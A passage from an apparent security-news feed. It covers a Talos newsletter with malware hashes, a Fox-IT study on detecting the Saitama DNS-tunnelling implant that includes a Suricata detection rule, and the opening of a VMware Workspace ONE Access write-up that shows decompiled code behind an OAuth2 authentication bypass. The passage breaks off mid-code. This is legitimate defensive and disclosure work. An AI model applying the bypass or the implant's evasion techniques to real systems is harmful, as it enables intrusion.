Another thing we announced today is the creation of a new Twitter handle: @thezdibugs. This feed will only tweet out published advisories that either have a high CVSS score, are 0-days, or result from Pwn2Own. If you're interested in those types of bug reports, we ask that you give it a follow. We're also now on Instagram, and you can follow us there if you prefer that platform over Twitter.

Looking at our published and upcoming bug reports, we are on track for our busiest year ever, for the third year in a row.
That also means we'll have plenty of data to look at as we track incomplete or otherwise faulty patches, and we'll use this data to adjust these timelines as needed based on what we are seeing across the industry. Other groups may have different timelines, but this is our starting point. With an estimated 1,700 disclosures this year alone, we should be able to gather plenty of metrics. Hopefully, we will see improvements as time goes on. Until then, stay tuned to this blog for updates, subscribe to our YouTube channel, and follow us on Twitter for the latest news and research from the ZDI.

# Threat Source newsletter (Aug. 11, 2022) — All of the things-as-a-service

11 August 2022 at 18:00

By Jon Munshaw.

Welcome to this week's edition of the Threat Source newsletter.

Everyone seems to want to create the next "Netflix" of something. Xbox's Game Pass is the "Netflix of video games." Rent the Runway is a "Netflix of fashion" where customers subscribe to a rotation of fancy clothes. And now threat actors are looking to be the "Netflix of malware."

All categories of malware have some sort of "as-a-service" twist now. Some of the largest ransomware groups in the world operate "as a service," allowing smaller groups to pay a fee in exchange for using the larger group's tools. Our latest report on information-stealers points out that "infostealers as-a-service" are growing in popularity, and our researchers also discovered a new "C2 as-a-service" platform where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from.

This is a particularly scary trend to me because of how easy, relatively speaking, it makes things for anyone with a basic knowledge of computers to carry out a cyber attack.
Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like "Knight Rider" to the live action of "Shrek: The Musical" and everything in between. How much longer before anyone with access to the internet can log into a single dark web site and surf for whatever they're in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I don't even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix, so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti.

With everything going "as a service," I don't necessarily need the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whomever I want. This is not as easy as picking a show on Netflix. But it's not a huge leap from the skills gap Netflix closes (letting my Grandma surf for any show she wants without scrolling through cable channels or driving to the library to check out a DVD) to the gap these services close for someone who knows just enough PowerShell to launch an "as-a-service" ransomware attack.

I have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these "as a service" platforms offline. Maybe that just means we need to start working on the "Netflix of cybersecurity tools."

## The one big thing

Historically, cybercrime was considered white-collar criminal behavior perpetrated by those who were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and the desire can get started in cybercrime.
The growth of cryptocurrencies and their associated anonymity, whether legitimate or not, has garnered the attention of criminals who formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more, instead of traditional "hands-on" crime.

### Why do I care?

Everyone panics when the local news shows a graph with "violent crime" increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and its potential to grow. As mentioned above, "as a service" malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware, or just try to scam someone out of a few thousand dollars.

### So now what?

Law enforcement, especially at the local level, is going to need to evolve along with the criminals it is tasked with protecting the general public from. The future criminal is going to be aware of operational security and technologies like Tor that make arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams, like the classic "I'm in the hospital and need money."

## Other news of note

Microsoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild, and Microsoft considers it "more likely" to be exploited. MSDT was already the target of the so-called "Follina" zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products.
Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and a memory leak. (Talos blog, Krebs on Security, SecurityWeek)

Some of the U.K.'s 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The country's National Health Service warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advanced, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients' records, though the incident has been "contained." (SC Magazine, Bloomberg, The Guardian)

An 18-year-old and her mother are facing charges in Nebraska over an alleged medication abortion, based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court's reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. (Vice, CNN)

## Can't get enough Talos?

## Upcoming events where you can find Talos

- (Aug. 10 - 12, 2022) Las Vegas, Nevada
- (Aug. 11 - 14, 2022) Las Vegas, Nevada
- (Aug. 25, 2022) Virtual

## Most prevalent malware files from Talos telemetry over the past week

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

MD5: 2c8ea737a232fd03ab80db672d50a17a
Typical Filename: LwssPlayer.scr
Claimed Product: 梦想之巅幻灯播放器
Detection Name: Auto.125E12.241442.in02

MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

MD5: 311d64e4892f75019ee257b8377c723e
Typical Filename: ultrasurf-21-32.exe
Claimed Product: N/A
Detection Name: W32.DFC.MalParent

# Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study

11 August 2022 at 16:05

Max Groot & Ruud van Luijk

**TL;DR** A malware sample dubbed 'Saitama' was recently uncovered by security firm Malwarebytes in a weaponized document, possibly targeting the Jordanian government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group's Research and Intelligence Fusion Team (RIFT) to detect DNS-tunnelling implants such as Saitama. The developed implementation as well as recordings of the implant are shared on the Fox-IT GitHub.

## Introduction

For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats.
Such detection efforts vary across all tactics, techniques, and procedures (TTPs) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.

In May 2022, security firm Malwarebytes published a two-part blog [1][2] about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed 'Saitama', sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect, even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries.

Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOCs) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required.

This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set up in a variety of ways, and how this variety affects the detection engineering process. To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama on the Fox-IT GitHub. This can be used to control the implant in a lab environment. Moreover, 'on the wire' recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant's traffic, using a Suricata signature and behavioural detection.

## Reconstructing the Saitama traffic

The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere [3].
However, to generate a full recording of the implant's behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the "PCAP or it didn't happen" philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP.

The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a proof of concept. We do not intend to fully weaponize the implant "for the greater good", and have thus provided resources up to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.

## Let's do the twist

The usage of DNS as the channel for C2 communication has a few upsides and several major downsides from an attacker's perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee that the query reaches the C2 server. For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync so that they both shuffle their character sets in the same way.

On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable.
Using a shared secret key ("haruto" for the variant discussed here) and a shared initial character set ("razupgnv2w01eos4t38h7yqidxmkljc6b9f5"), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every 'twist'.

To encode this counter, the implant relies on a function named '_IntToString'. This function receives an integer and a 'base string', which for the first DNS query is the same initial, shared character set identified in the previous paragraph. Until the input number is equal to or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable 'str', which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down.

To determine the initial seed, the server has to 'invert' this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion, because the conversion rounds down without any decimals. The server tries to invert this conversion using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client, and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server simply tries successively higher numbers until the correct seed is found.

Once this hurdle is cleared, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server.
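To make the encoding concrete, here is a minimal Python sketch of the counter encoding and the server-side recovery search described above. The function and variable names are ours, and the arithmetic is deliberately simplified: in this simplified form the server's first estimate is already exact, so the verify-and-increment loop never has to run, whereas the real implant's lossy division is exactly why that search step exists. Note that the shared character set has 36 unique characters, so the maximum counter value of 46655 (36³ − 1) fits in three characters.

```python
CHARSET = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # shared initial character set (36 chars)

def int_to_string(number: int, base_str: str) -> str:
    # Simplified mirror of the implant's '_IntToString': per iteration,
    # pick a character, prepend it, and divide the number down by the
    # length of the base string.
    out = ""
    while number > 0:
        out = base_str[number % len(base_str)] + out
        number //= len(base_str)
    return out

def recover_seed(encoded: str, base_str: str) -> int:
    # Server side: invert the encoding into an estimate, then verify by
    # re-encoding. If the estimate undershoots (as it can with the real
    # implant's lossy division), try successively higher numbers until
    # re-encoding reproduces the observed string.
    candidate = 0
    for ch in encoded:
        candidate = candidate * len(base_str) + base_str.index(ch)
    while int_to_string(candidate, base_str) != encoded:
        candidate += 1
    return candidate
```

The point of `recover_seed` is the strategy, not the arithmetic: the server does not need a closed-form inverse as long as it can cheaply test candidate seeds against the observed query.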
Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same 'language'. The server then simply substitutes the characters from the shuffled alphabet back into the 'base' alphabet to derive what data was sent by the client.

## Twist, Sleep, Send, Repeat

Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour only triggers an alert when it happens multiple times in a certain period.

The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output to the server), the minimum sleep time is 40 seconds and the maximum is 80 seconds. On every DNS query sent, the client picks a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time, but is distributed across three domains; on every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to 'skip' the sleeping step altogether.

These sleep times and the distribution of communication hinder detection efforts, as they allow the implant to further 'blend in' with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the 'needle' that is this implant's traffic very deep in the haystack of the overall network traffic. For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy and keeping it usable.
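Putting the pieces above together, a minimal model of the per-request behaviour: a shared-seed shuffle of the alphabet plus a randomized sleep and domain choice. This is a sketch, not the implant's code; Python's `random` module happens to also be a Mersenne Twister, but the implant's exact shuffle order will differ, and the domain names are placeholders:

```python
import random

BASE = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"
DOMAINS = ["c2-one.example", "c2-two.example", "c2-three.example"]  # placeholders

def shuffled_charset(counter):
    # Both sides seed their PRNG with the shared counter and therefore
    # derive the exact same shuffled alphabet.
    rng = random.Random(counter)
    chars = list(BASE)
    rng.shuffle(chars)
    return "".join(chars)

def encode(data, counter):
    # Client side: encode using the shuffled alphabet.
    return data.translate(str.maketrans(BASE, shuffled_charset(counter)))

def decode(data, counter):
    # Server side: substitute shuffled characters back into the base alphabet.
    return data.translate(str.maketrans(shuffled_charset(counter), BASE))

def next_beacon_parameters():
    # Hardcoded bounds: a uniform 40-80 second sleep, and one of three
    # domains chosen at random per request.
    return random.uniform(40, 80), random.choice(DOMAINS)

assert decode(encode("whoami", 1234), 1234) == "whoami"
```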
Considering Saitama's sleep times, and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the 'whoami /priv' command, which is 663 bytes once zlib-deflated, takes more than an hour to transmit from victim machine to C2 server.

*Transmission between server implementation and the implant*

The implant does contain a set of hardcoded commands that can be triggered using only a command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are actually used by attackers, or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other command.

## Detection

Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While 'idle' implants can be hard to detect due to the little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command output. These communication 'bursts' are where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.

### Signature-based

Where possible, we aim to write signature-based detection, as this provides a solid base and quick tool attribution.
The randomization used by the Saitama implant, as outlined previously, makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule:

alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;)

This signature may seem a bit complex, but dissected into separate parts it is intuitive given the previous sections. The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the 'send and receive' command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data, followed by 20 bytes of base-32 encoded output. Lastly, the current value of the 'counter' variable is sent. As this number can range between 0 and 46656, it takes between 1 and 5 bytes.

### Behaviour-based

The randomization that makes it difficult to create signatures is also to the defender's advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part.
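Returning to the Suricata signature above, its PCRE component can be quick-checked with Python's `re` module (Suricata uses a PCRE dialect, but the features used here behave the same):

```python
import re

# The pcre component of the Saitama Suricata rule: a 28-31 character
# subdomain of lowercase letters and digits, which must contain at least
# one letter and at least one digit (the lookahead), under a two-label tail.
SAITAMA_RE = re.compile(
    r"^(?=[0-9]+[a-z]|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$"
)

# A 28-character label mixing letters and digits matches...
assert SAITAMA_RE.match("a0" * 14 + ".example.com")
# ...while an ordinary, letters-only label of the same length does not.
assert not SAITAMA_RE.match("w" * 28 + ".example.com")
```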
While initially one might opt for measuring entropy to approximate randomness, that technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about, is better suited.

Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel, an attacker needs to be able to send multiple commands and receive the corresponding output, resulting in (slow) bursts of multiple queries. This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as 'randomized'.

The specifics of these bursts differ slightly between tools, but in general there is little or no idle time between two queries. Saitama is an exception in this case: it uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start for determining the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value, and in 50% of the cases there are fewer than 60 queries in an hour. To make sure we detect this regardless of the random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that results in an acceptable detection probability: that would be 53. We use 50 in our signature and other rules to account for possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold.
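The threshold reasoning above can be reproduced numerically. This sketch treats the total time of n uniform 40-80 second sleeps as approximately normal and computes the probability of seeing at least n queries within one hour:

```python
import math

MEAN = (40 + 80) / 2        # 60 s expected sleep per query
VAR = (80 - 40) ** 2 / 12   # variance of a uniform distribution

def prob_at_least(n, window=3600):
    # P(the sum of n sleeps fits inside the window), via the normal
    # approximation of a sum of independent uniform variables.
    mu = n * MEAN
    sigma = math.sqrt(n * VAR)
    z = (window - mu) / sigma
    return 0.5 * (1 + math.erf(z / math.sqrt(2)))  # standard normal CDF

# At the mean of 60 queries per hour the hit rate is only 50%, whereas a
# threshold of 53 queries is reached with near certainty.
assert abs(prob_at_least(60) - 0.5) < 1e-9
assert prob_at_least(53) > 0.999
```

Lowering the count further to 50, as the rule does, buys additional headroom for packet loss and other unexpected factors.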
Different thresholds for different tools may be used to balance false positives and false negatives. In summary, combining detection of random-appearing DNS queries with a minimum threshold of such queries per hour can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and, more importantly, easy to use on different platforms such as network sensors or SIEMs and on diverse types of logs.

## Conclusion

When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant's behaviour, which can subsequently be used for detection engineering purposes.

Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.

## Resources

With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions. The server-side implementation of Saitama can be found on the Fox-IT GitHub. This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant.
The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP.

# Microsoft Bug Bounty Programs Year in Review: $13.7M in Rewards

11 August 2022 at 16:00
The Microsoft Bug Bounty Programs and partnerships with the global security research community are important parts of Microsoft’s holistic approach to defending customers against security threats. Our bounty programs incentivize security research in high-impact areas to stay ahead of the ever-changing security landscapes, emerging technology, and new threats. Security Researchers help us secure millions of …

# IAM Whoever I Say IAM :: Infiltrating VMWare Workspace ONE Access Using a 0-Click Exploit

11 August 2022 at 14:00

On March 2nd, I reported several security vulnerabilities to VMWare impacting their Identity Access Management (IAM) solution. In this blog post I will discuss some of the vulnerabilities I found, the motivation behind finding them, and how companies can protect themselves. The research project concluded with a pre-authenticated remote root exploit chain nicknamed Hekate. The advisories and patches for these vulnerabilities can be found in the references section.

## Introduction

Single Sign On (SSO) has become the dominant authentication scheme to log in to several related, yet independent, software systems. At the core of this are the identity providers (IdP). Their role is to perform credential verification and to supply a signed token containing assertions that service providers (SP) can consume for access control. This is implemented using a protocol called Security Assertion Markup Language (SAML).

On the other hand, when an application requests resources on behalf of a user and access is granted, an authorization request is made to an authorization server (AS). The AS exchanges a code for a token, which is presented to a resource server (RS), and the requested resources are consumed by the requesting application. This is known as Open Authorization (OAuth); the "auth" here stands for authorization, not authentication.

Whilst OAuth2 handles authorization (access) and SAML handles authentication (identity), a solution is needed to manage both, since an organization's network perimeter can get very wide and complex. Therefore, Identity and Access Management (IAM) solutions have become very popular in the enterprise environment to handle both use cases at scale.

## Motivation

This project was motivated by high-impact vulnerabilities affecting similar software products. Let's take a look, in no particular order:

1. Cisco Identity Services Engine

This product was pwned by Pedro Ribeiro and Dominik Czarnota using a pre-authenticated stored XSS vulnerability, leading to full remote root access by chaining two additional vulnerabilities.

2. ForgeRock OpenAM

This product was pwned by Michael Stepankin using a pre-authenticated deserialization of untrusted data vulnerability in a 3rd party library called jato. Michael had to get creative here by using a custom Java gadget chain to exploit the vulnerability.

3. Oracle Access Manager (OAM)

Peter Json and Jang blogged about a pre-authenticated deserialization of untrusted data vulnerability impacting older versions of OAM.

4. VMWare Workspace ONE Access

Two high-impact vulnerabilities were discovered here. The first was CVE-2020-4006, which was exploited in the wild (ITW) by state-sponsored attackers, which is what excited my interest initially. The details of this bug were first revealed by William Vu, and it essentially boiled down to a post-authenticated command injection vulnerability. The fact that this bug was post-authenticated and yet was still exploited in the wild likely means that this software product is of high interest to attackers.

The second vulnerability was discovered by Shubham Shah of Assetnote: an SSRF that could have been used by malicious attackers to leak a user's JSON Web Token (JWT) via the Authorization header.

With most of this knowledge before I even started, I knew that vulnerabilities discovered in a system like this would have a high impact. So, at the time I asked myself: does a pre-authenticated remote code execution vulnerability/chain exist in this code base?

## Version

The vulnerable version at the time of testing was 21.08.0.1 which was the latest and deployed using the identity-manager-21.08.0.1-19010796_OVF10.ova (SHA1: 69e9fb988522c92e98d2910cc106ba4348d61851) file. It was released on the 9th of December 2021 according to the release notes. This was a Photon OS Linux deployment designed for the cloud.

## Challenges

I had several challenges and I think it’s important to document them so that others are not discouraged when performing similar audits.

1. Heavy use of Spring libraries

This software product heavily relied on several Spring components and as such didn't leave room for many errors in relation to authentication. Interceptors played a huge role in the authentication process and were found not to contain any logic vulnerabilities in this case.

Additionally, with Spring's StrictHttpFirewall enabled, several attempts to bypass the authentication using well-known filter bypass attacks failed.

2. Minimal attack surface

There was very little pre-authenticated attack surface exposing application functionality outside of authentication protocols such as SAML and OAuth 2.0 (including OpenID Connect), which minimizes the chance of discovering a pre-authenticated remote code execution vulnerability.

3. Code quality

The code quality of this product was very good. Having audited many Java applications in the past, I noticed that this product was written with security in mind, and the overall layout of libraries, syntax used and spelling of the code was a good reflection of that. In the end, I only found two remote code execution vulnerabilities, and they were in a very similar component.

Let’s move on to discussing the vulnerabilities in depth.

## OAuth2TokenResourceController Access Control Service (ACS) Authentication Bypass Vulnerability

The com.vmware.horizon.rest.controller.oauth2.OAuth2TokenResourceController class has two exposed endpoints. The first will generate an activation code for an existing oauth2 client:

/*     */   @RequestMapping(value = {"/generateActivationToken/{id}"}, method = {RequestMethod.POST})
/*     */   @ResponseBody
/*     */   @ApiOperation(value = "Generate and update activation token for an existing oauth2 client", response = OAuth2ActivationTokenMedia.class)
/*     */   @ApiResponses({@ApiResponse(code = 500, message = "Generation failed, unknown error."), @ApiResponse(code = 400, message = "Generation failed, client is invalid or not specified.")})
/*     */   public OAuth2ActivationTokenMedia generateActivationToken(@ApiParam(value = "OAuth 2.0 Client identifier", example = "\"my-auth-grant-client1\"", required = true) @PathVariable("id") String clientId, HttpServletRequest request) throws MyOneLoginException {
/* 128 */     OrganizationRuntime orgRuntime = getOrgRuntime(request);
/* 129 */     OAuth2Client client = this.oAuth2ClientService.getOAuth2Client(orgRuntime.getOrganizationId().intValue(), clientId);
/* 130 */     if (client == null || client.getIdUser() == null) {
/* 131 */       throw new BadRequestException("invalid.client", new Object[0]);
/*     */     }


The second will activate the device OAuth2 client by exchanging the activation code for a client ID and client secret:

/*     */   @RequestMapping(value = {"/activate"}, method = {RequestMethod.POST})
/*     */   @ResponseBody
/*     */   @ApiOperation(value = "Activate the device client by exchanging an activation code for a client ID and client secret.", notes = "This endpoint is used in the dynamic mobile registration flow. The activation code is obtained by calling the /SAAS/auth/device/register endpoint. The client_secret and client_id returned in this call will be used in the call to the /SAAS/auth/oauthtoken endpoint.", response = OAuth2ClientActivationDetails.class)
/*     */   @ApiResponses({@ApiResponse(code = 500, message = "Activation failed, unknown error."), @ApiResponse(code = 404, message = "Activation failed, organization not found."), @ApiResponse(code = 400, message = "Activation failed, activation code is invalid or not specified.")})
/*     */   public OAuth2ClientActivationDetails activateOauth2Client(@ApiParam(value = "the activation code", required = true) @RequestBody String activationCode, HttpServletRequest request) throws MyOneLoginException {
/* 102 */     OrganizationRuntime organizationRuntime = getOrgRuntime(request);
/*     */     try {
/* 104 */       return this.activationTokenService.activateAndGetOAuth2Client(organizationRuntime.getOrganization(), activationCode);
/* 105 */     } catch (EncryptionException e) {
/* 106 */       throw new BadRequestException("invalid.activation.code", e, new Object[0]);
/* 107 */     } catch (MyOneLoginException e) {
/*     */
/* 109 */       if (e.getCode() == 80480 || e.getCode() == 80476 || e.getCode() == 80440 || e.getCode() == 80558) {
/* 110 */         throw new BadRequestException("invalid.activation.code", e, new Object[0]);
/*     */       }
/* 112 */       throw e;
/*     */     }
/*     */   }


This is enough for an attacker to then exchange the client_id and client_secret for an OAuth2 token, achieving a complete authentication bypass. Now, this wouldn't have been so easily exploitable if no default OAuth2 clients were present, but as it turns out, there are two internal clients installed by default:

We can verify this when we check the database on the system:

These clients are created in several locations, one of them being the com.vmware.horizon.rest.controller.system.BootstrapController class. I won't bore you with the full stack trace, but it essentially leads to a call to createTenant in the com.vmware.horizon.components.authentication.OAuth2RemoteAccessServiceImpl class:

/*     */   public boolean createTenant(int orgId, String tenantId) {
/*     */     try {
/* 335 */       createDefaultServiceOAuth2Client(orgId); // 1
/* 336 */     } catch (Exception e) {
/* 337 */       log.warn("Failed to create the default service oauth2 client for org " + tenantId, e);
/* 338 */       return false;
/*     */     }
/* 340 */     return true;
/*     */   }


At [1] the code calls createDefaultServiceOAuth2Client:

/*     */   @Nonnull
/*     */   public OAuth2Client createDefaultServiceOAuth2Client(int orgId) throws MyOneLoginException {
/* 116 */     OAuth2Client oAuth2Client = this.oauth2ClientService.getOAuth2Client(orgId, "Service__OAuth2Client");
/* 117 */     if (oAuth2Client == null) {
/* 118 */       Organizations firstOrg = this.organizationService.getFirstOrganization();
/* 119 */       if (firstOrg.getId().intValue() == orgId) {
/* 120 */         log.info("Creating service_oauth2 client for root tenant.");
/* 121 */         return createSystemScopedServiceOAuth2Client(firstOrg, "Service__OAuth2Client", null, "admin system"); // 2
/*     */       }
/*     */     //...
/* 131 */     return oAuth2Client;
/*     */   }


The code at [2] calls createSystemScopedServiceOAuth2Client which, as the name suggests, creates a system-scoped OAuth2 client using the clientId "Service__OAuth2Client". I actually found another authentication bypass, documented as SRC-2022-0007, using variant analysis; however, it impacts only the cloud environment, because the on-premise version does not load the authz Spring profile by default.
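The bypass's final step, exchanging the activated client credentials for a token, is just standard OAuth2. As a sketch (hedged: the /SAAS/auth/oauthtoken path comes from the API documentation quoted earlier, while the client_credentials grant and parameter names follow generic OAuth2 and are assumptions here; the host is a placeholder):

```python
import urllib.parse
import urllib.request

def token_request(host, client_id, client_secret):
    # Build a standard OAuth2 client_credentials token request (RFC 6749)
    # against the /SAAS/auth/oauthtoken endpoint.
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
    }).encode()
    return urllib.request.Request(
        f"https://{host}/SAAS/auth/oauthtoken",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )

# urllib.request.urlopen(token_request(...)) against a vulnerable host
# would then return the token response containing the signed JWT.
```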

## DBConnectionCheckController dbCheck JDBC Injection Remote Code Execution Vulnerability

The com.vmware.horizon.rest.controller.system.DBConnectionCheckController class exposes a method called dbCheck:

/*     */   @RequestMapping(method = {RequestMethod.POST}, produces = {"application/json"})
/*     */   @ProtectedApi(resource = "vrn:tnts:*", actions = {"tnts:read"})
/*     */   @ResponseBody
/*     */   public RESTResponse dbCheck(@RequestParam(value = "jdbcUrl", required = true) String jdbcUrl, @RequestParam(value = "dbUsername", required = true) String dbUsername, @RequestParam(value = "dbPassword", required = true) String dbPassword) throws MyOneLoginException {
/*     */     String driverVersion;
/*     */     try {
/*  76 */       if (this.organizationService.countOrganizations() > 0L) { // 1
